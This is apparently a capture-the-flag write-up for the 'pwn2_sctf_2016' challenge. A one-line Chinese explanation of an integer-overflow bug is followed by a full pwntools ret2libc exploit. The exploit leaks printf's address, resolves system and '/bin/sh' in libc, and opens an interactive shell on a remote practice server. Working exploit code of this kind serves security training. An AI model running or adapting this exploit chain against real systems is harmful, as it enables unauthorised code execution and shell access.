pwn2_sctf_2016
查看保护
这里的 int 被转换成了无符号数，输入 -1 时值会变得很大（整型溢出），ret2libc 即可。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1

# `debug` picks the remote CTF instance; anything falsy runs the local binary.
# The name follows the original writeup even though it reads inverted — treat it
# as a "use remote" switch.
r = remote('node4.buuoj.cn', 25828) if debug else process(file_name)

# Target ELF; PLT/GOT/symbol addresses used later are read from this object.
elf = ELF(file_name)
def dbg():
    """Attach gdb to the live tube `r` (helper, not called by the script itself)."""
    gdb.attach(r)
# Stage 1: leak the runtime address of printf via its GOT entry.
# Root cause (per the writeup above): the requested length is checked as a
# signed int but consumed as unsigned, so "-1" passes the check and permits an
# oversized read into the stack buffer. The program-side fix is to validate the
# length as an unsigned upper bound and reject negative input.
r.recvuntil('ow many bytes do you want me to read? ')
r.sendline('-1')

plt_printf = elf.plt['printf']
main_addr = elf.sym['main']
got_printf = elf.got['printf']

# 0x2c bytes of buffer plus 4 more up to the saved return address, per the
# author's stack layout (not derivable from this page alone).
padding = b'a' * (0x2c + 4)
stage1 = padding + p32(plt_printf) + p32(main_addr) + p32(got_printf)
r.sendline(stage1)

# Two lines precede the leaked pointer (presumably program output echoed back).
for _ in range(2):
    r.recvuntil('\n')
printf_addr = u32(r.recv(4))

# Stage 2: resolve system and the "/bin/sh" string against the given libc build.
libc = ELF('./libc-2.23.so')
libc_base = printf_addr - libc.sym['printf']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))

r.recvuntil('How many bytes do you want me to read? ')
r.sendline('-1')
r.recvuntil('\n')
stage2 = padding + p32(system_addr) + p32(main_addr) + p32(bin_sh)
r.sendline(stage2)
r.interactive()